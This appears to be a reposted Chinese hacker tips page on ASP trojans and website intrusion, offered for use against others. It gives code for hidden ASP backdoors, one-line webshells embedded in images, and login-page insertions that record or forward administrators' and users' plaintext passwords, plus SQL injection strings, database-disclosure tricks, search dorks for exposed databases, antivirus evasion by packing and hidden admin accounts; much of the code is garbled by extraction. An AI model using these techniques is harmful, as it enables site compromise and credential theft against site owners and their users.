asp木马常识综合

asp木马常识综合

2023年7月14日发(作者:)

asp⽊马常识综合建⼀个asp⽂件,内容为 找⼀个正常图⽚,插⼊⼀句话⽊马(⽐如冰狐的),⽤ultraedit进⾏hex编译,插⼊图⽚⾥,为了运⾏成功,还要搜索%和%,将其变为00,(不要替换⾃⼰asp的),再把jpg⽂件开头加⼊ 2. 名称:整蛊⽹吧先⽤精锐⽹吧辅助⼯具得到⽤户名和密码,然后⽤计算机管理联结⼀台机器,开telnet,连接,开共享,复制⼀个⽊马过去运⾏即可。 3.名称:感受MD5暴⼒破解的魅⼒rainbowcrack⽤法先⽤rtgen⽣成库 "rtgen md5 byte 1 7 5 2400 40000 all"1和7代表密码最⼩和最⼤长度4.很多时候我们做免杀⽊马,不⽤懂汇编,⽤北⽃加壳程序就能逃杀,还有很多加壳软件,⼤家⽊马加壳的时候最好多选择不知名的加壳软件。5.名称:隐蔽的插⼊型ASP⽊马(1)在我们要做⼿脚的asp⽂件⾥加⼊如下内容<%if request("action")="ok" then%> shell代码插在这⾥,最好是⼩马,还要加密⼀下 <%end if%> 访问的时候在你作⼿脚的asp⽂件后⾯加上?action=ok,即可(2)另⼀种⽅法,在我们要做⼿脚的asp⽂件⾥加⼊如下内容<%on error resume nextstrFileName = tring("filer")set objStream = Object("") = omFile File h(""),2%> 访问的时候在做⼿脚的asp⽂件后⾯加上?filer=XXXXXX为你本地上传的⼀个路径如 c:上传后在做⼿脚的asp的同⽂件夹中有ating,asp(3)前提得到system权限,进⼊⽹站⽬录下⼀层mkdir s…copy s…/这样杀毒软件找不到的⽤户名为:hack 密码110,在DOS下和计算机管理器上看不到你建⽴的⽤户,并且是删除不掉的。7.名称:QQ群脚本攻击打开qq对话诓,复制消息,然后,下⾯的内容保存为.vbs ⽂件,运⾏即可。

Set WshShell= object("")ivate "QQ信息攻击脚本"for i=1 to ys"^v"ys ys "%s"Next 8.搜索:程序制作:万鹏 有免费申请空间的,直接上传asp马即可。9. 名称:全⾯找出你站上的ASP⽊马(1) ⽤杀毒软件(2) ⽤FTP客户端软件,点"⼯具"->"⽐较⽂件夹"(3) ⽤上传到站点空间查看,⼀般功能多的ASP我估计就是ASP⽊马(4) ⽤⼯具Beyond Compare10名称:拓展思路拿DVBBS帐号 "⼀个⼈的圣经"的动画(1)以前获得webshell后想进⼊DVBBS的后台,想要管理员的密码,可以这样,⽼办法:修改admin_得到明⽂DVBBS后台密码在"username=trim(replace(request("username")这⾏后⾯

Dim fsoObject

Dim tsObject

Set fsoObject = Object("stemObject")

set tsObject = TextFile(h(""))

CStr(request("password"))

Set fsoObject = Nothing

Set tsObject = Nothing

只要管理员登陆后台,在⽬录下就⽣成了。(2)中Case "login_chk"下:

on error resume nextDim rainset rain=object("")=t="gb2312"on=

omFile h("")ext now&request("username")&"text:"&request("password")&chr(10)

File h(""),2

set rain=nothing

这样将获得全部登陆⼈的登陆时间,⽤户名和密码。(3)如果你有⾃⼰的⽹站或者另外的webshell(强烈建议使⽤): 可以建⽴⽬录laner,在⾥⾯建⽴⼀个空的和如下代码的:

<%if request("n")<>"" and request("p")<>"" then

on error resume nextDim rainset rain=object("")=t="gb2312"on=

omFile h("")ext now&"Name:"&request("n")&"Password:"&request("p")&chr(10)File h(""),2

set rain=nothing

end if%>

11. 名称:利⽤QQ在线状态抓鸽⼦⾁鸡⽣成qq在线状态,把⾥⾯的地址改成⽊马地址,发到论坛在那⾥插⼊⼀句:

n="&request("username")&""&"&p="&request("password")("username")&""&"&p="&request("password")&">"

结果所有登陆⼈都会乖乖的把名字和密码送到你的 ⾥12. 动画名称:媒体中国整站程序存在多处漏洞漏洞程序:媒体中国整站程序(第⼀版)漏洞: %5c(暴库) 上传 注⼊上传页⾯:down1/13. 名称:免费电话+MSH命令⾏⼯具要注意的就是,固定电话,⼩灵通 形式为6 521本来时0521,要省略前⾯的零,⼿机号也是⼀样。14. 名称:Bo-Blog的新漏洞把其中"禁⽌搜索的词"那部分另存出来,⾥⾯的地址改完整,插⼊⼀句话⽊马15. 名称:钩魂者⼊侵传奇SiFu私服⽤百度 搜索 传奇 inurl:tuku或者 传奇 inurl:再或者 传奇 inurl:友情链接⾥插⼊⼀句话⽊马即可16. 程序: 宏达企业整站上传漏洞漏洞页⾯:/cx/ (上传漏洞)17.⽆间盗邮箱,在修改密码⾥,⽤户名和密码⾥添or=or18.名称: bbsxp5.16后台得到webshellbbsxp5.16过滤了 asp,asp,cdx,cer,扩展名的⽂件上传,就是在基本设置上添加上上传类型也不⾏,并禁⽌了修改数据备份数据名称,我们可以把此⽹页保存在本地,改源代码上传。19.名称:JHACKJ 2005年最新精典教程下载看看吧,不错,各⼤⽹站都有20.名称:省⼒⼊侵韩国⾁鸡这是⾼级搜索项,关键字随便写。这⾥我写asp?name= 设置为每页显⽰100条。语种选择韩⽂。搜索,很多sa.21.名称:任何⽹吧的管理系统破解选智能ABC,然后vv输⼊,光标后退两步,按delete键 刚输⼊的两个vv删除, 最后按Inter键。22.名称:破解QQ空间插⼊⽹页⽊马的代码现在腾讯已经封了很多QQ空间代码了,就如以前

插⼊⽹页⽊马的代码也早被封了,突破禁⽤的⽅法,代码如下:

" style=display:none>

最后附上总结的1.上传漏洞[不多讲]pS: 如果看到:选择你要上传的⽂件 [重新上传]或者出现"请登陆后使⽤",80%就有漏洞了!有时上传不⼀定会成功,这是因为Cookies不⼀样.我们就要⽤WSockExpert取得Cookies.再⽤DOMAIN上传.2.注⼊漏洞[不多讲]pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以⽤以下命令:3.旁注,也就是跨站.我们⼊侵某站时可能这个站坚固的⽆懈可击,我们可以找下和这个站同⼀服务器的站点,然后在利⽤这个站点⽤提权,嗅探等⽅法来⼊侵我们 要⼊侵的站点。,在这⾥有个难点,就是⼀些服务器的绝对路径经过加密,这就看我们的本事了4.暴库:把⼆级⽬录中间的/换成%5c如果你能看到:E:ahttc040901otherwebdzdatabaseiXuEr_不是⼀个有效的路径。 确定路径名称拼写是否正确,以及是否 连接到⽂件存放的服务器。这样的就是数据库了。下载时⽤FLASHGET换成.MDB格式的就⾏.=or这是⼀个可以连接SQL的语名句.可以直接进⼊后台。我收集了⼀下。类似的还有:or= " or "a"="a ) or (a=a ") or ("a"="a or 1=1-- or a=a6.社会⼯程学。这个我们都知道吧。就是猜解。admin waishi7.写⼊ASP格式数据库。就是⼀句话⽊马[ ],常⽤在留⾔本.8.源码利⽤:⼀些⽹站⽤的都是⽹上下载的源码.有的站长很菜.什么也不改.这个站⽤的是:杰出校友录,源码我下过了,默认数据库/webshell路径:databaseliangu_ 后台管理:adm_ 密码及⽤户名都是admin9.默认数据库/webshell路径利⽤:这样的⽹站很多/利⼈别⼈的WEBSHELL.

/Databackup//bbs/Databackup//bbs/Data//data//bbs///bbs//bbs//bbs//bbs/

⼯具:⽹站猎⼿ 挖掘鸡10.查看⽬录法:⼈⼀些⽹站可以断开⽬录,可以⽅问⽬录。这样我们可以找到数据库,下载不⽤我教吧11.⼯具溢出:.asp?NewsID= /?id=18 .asp?id=[这种⽅法可以取得⼤量的WEBSHELL]12.搜索引擎利⽤:(1).inurl:flasher_ 默认数据库:database/ 后台/manager/(2).找⽹站的管理后台地址:site:ext:管理site:itle:管理 <关键字很多,⾃已找>site:rl:login(3).查找access的数据库,mssql、mysql的连接⽂件allinurl:bbsdatafiletype:mdbinurl:databasefiletype:incconninurl:datafiletype:mdb我主不做了。。⾃已做做吧。。欺骗:把⾃⼰的ID修改成管理员的,MD5密码也修改成他的,⽤桂林⽼兵⼯具可以修改COOKIE。这个我就不多讲了

发布者:admin,转转请注明出处:http://www.yc00.com/web/1689309740a228544.html

相关推荐

发表回复

评论列表(0条)

  • 暂无评论

联系我们

400-800-8888

在线咨询: QQ交谈

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息

关注微信